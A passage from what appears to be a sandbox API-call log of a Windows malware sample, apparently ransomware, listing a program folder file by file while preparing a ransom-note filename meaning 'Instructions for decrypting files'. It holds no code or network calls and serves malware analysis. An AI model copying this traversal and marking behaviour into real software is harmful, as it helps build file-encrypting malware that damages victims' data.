out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.840] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aa48, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0104.840] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0104.841] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0104.841] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0104.841] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0104.842] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\", cchLength=0x32 | out: lpsz="c:\\program files\\common files\\microsoft shared\\dw\\") returned 0x32 [0104.842] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0104.842] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0104.842] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.844] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0104.845] IMalloc:Free (This=0x767666bc, pv=0x578208) [0104.845] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0104.845] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0104.845] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.845] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.845] GlobalUnlock (hMem=0x45000c) returned 0 [0104.845] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.845] GlobalLock (hMem=0x450004) returned 0x591988 [0104.845] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.845] GlobalUnlock (hMem=0x45000c) returned 0 [0104.845] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.845] GlobalUnlock (hMem=0x450004) returned 0 [0104.845] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x573400 [0104.846] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.846] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0104.846] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0104.846] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.846] GlobalLock (hMem=0x450004) returned 0x591988 [0104.846] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.846] GlobalUnlock (hMem=0x450004) returned 0 [0104.846] GlobalLock (hMem=0x450004) returned 0x591988 [0104.846] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.846] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.846] GlobalUnlock (hMem=0x450004) returned 0 [0104.846] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.846] GlobalUnlock (hMem=0x45000c) returned 0 [0104.846] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.847] CharLowerBuffW (in: lpsz="DBGHELP.DLL", cchLength=0xb | out: lpsz="dbghelp.dll") returned 0xb [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="b", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", cchWideChar=61, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL", lpUsedDefaultChar=0x0) returned 61 [0104.847] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\DW\\DBGHELP.DLL", lpUsedDefaultChar=0x0) returned 4 [0104.848] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8f7000, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdb9ec040, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2f8f7000, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0xf2b88, dwReserved0=0x0, dwReserved1=0x0, cFileName="DW20.EXE", cAlternateFileName="")) returned 1 [0104.848] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.848] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.848] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.848] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.848] GlobalUnlock (hMem=0x45000c) returned 0 [0104.848] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.848] GlobalLock (hMem=0x450004) returned 0x593998 [0104.848] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.848] GlobalUnlock (hMem=0x45000c) returned 0 [0104.848] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.848] GlobalUnlock (hMem=0x450004) returned 0 [0104.848] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.849] CharLowerBuffW (in: lpsz="DW20.EXE", cchLength=0x8 | out: lpsz="dw20.exe") returned 0x8 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.849] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE", cchWideChar=58, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXEï", lpUsedDefaultChar=0x0) returned 58 [0104.849] CharLowerBuffW (in: lpsz=".EXE", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.849] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exeShared\\DW\\DW20.EXEï", lpUsedDefaultChar=0x0) returned 4 [0104.850] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 1 [0104.850] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.850] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.850] GlobalLock (hMem=0x450004) returned 0x591988 [0104.850] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.850] GlobalUnlock (hMem=0x450004) returned 0 [0104.850] GlobalLock (hMem=0x450004) returned 0x591988 [0104.850] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.850] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.850] GlobalUnlock (hMem=0x450004) returned 0 [0104.850] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.850] GlobalUnlock (hMem=0x45000c) returned 0 [0104.850] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.851] CharLowerBuffW (in: lpsz="DWTRIG20.EXE", cchLength=0xc | out: lpsz="dwtrig20.exe") returned 0xc [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="xí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="0", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dí\x18", lpUsedDefaultChar=0x0) returned 1 [0104.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE", cchWideChar=62, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE ", lpUsedDefaultChar=0x0) returned 62 [0104.851] CharLowerBuffW (in: lpsz=".EXE", cchLength=0x4 | out: lpsz=".exe") returned 0x4 [0104.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".exe", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".exeShared\\DW\\DWTRIG20.EXE ", lpUsedDefaultChar=0x0) returned 4 [0104.852] FindNextFileW (in: hFindFile=0x573400, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e5e4300, ftCreationTime.dwHighDateTime=0x1cba06d, ftLastAccessTime.dwLowDateTime=0xdbe62980, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2e5e4300, ftLastWriteTime.dwHighDateTime=0x1cba06d, nFileSizeHigh=0x0, nFileSizeLow=0x99ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWTRIG20.EXE", cAlternateFileName="")) returned 0 [0104.852] GetLastError () returned 0x12 [0104.852] FindClose (in: hFindFile=0x573400 | out: hFindFile=0x573400) returned 1 [0104.852] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.852] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.852] GlobalUnlock (hMem=0x45000c) returned 0 [0104.852] GlobalLock (hMem=0x45000c) returned 0x58b008 [0104.852] GlobalLock (hMem=0x450004) returned 0x591988 [0104.852] GlobalHandle (pMem=0x58b008) returned 0x45000c [0104.852] GlobalUnlock (hMem=0x45000c) returned 0 [0104.852] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.852] GlobalUnlock (hMem=0x450004) returned 0 [0104.852] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0104.853] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0104.853] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.853] GlobalLock (hMem=0x450004) returned 0x591988 [0104.853] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.855] GlobalUnlock (hMem=0x450004) returned 0 [0104.855] GlobalLock (hMem=0x450004) returned 0x591988 [0104.855] GlobalLock (hMem=0x45000c) returned 0x593998 [0104.855] GlobalHandle (pMem=0x591988) returned 0x450004 [0104.855] GlobalUnlock (hMem=0x450004) returned 0 [0104.855] GlobalHandle (pMem=0x593998) returned 0x45000c [0104.855] GlobalUnlock (hMem=0x45000c) returned 0 [0104.855] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.856] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe166c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xdbe166c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.856] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0104.856] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0104.856] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.856] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.856] GlobalUnlock (hMem=0x45000c) returned 0 [0104.856] GlobalLock (hMem=0x45000c) returned 0x591988 [0104.856] GlobalLock (hMem=0x450004) returned 0x593998 [0104.856] GlobalHandle (pMem=0x591988) returned 0x45000c [0104.856] GlobalUnlock (hMem=0x45000c) returned 0 [0104.856] GlobalHandle (pMem=0x593998) returned 0x450004 [0104.856] GlobalUnlock (hMem=0x450004) returned 0 [0104.856] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.856] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a0ba500, ftCreationTime.dwHighDateTime=0x1c982ad, ftLastAccessTime.dwLowDateTime=0x6086b2d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a0ba500, ftLastWriteTime.dwHighDateTime=0x1c982ad, nFileSizeHigh=0x0, nFileSizeLow=0x14e760, dwReserved0=0x0, dwReserved1=0x0, cFileName="DBGHELP.DLL", cAlternateFileName="")) returned 1 [0104.856] FileTimeToLocalFileTime (in: 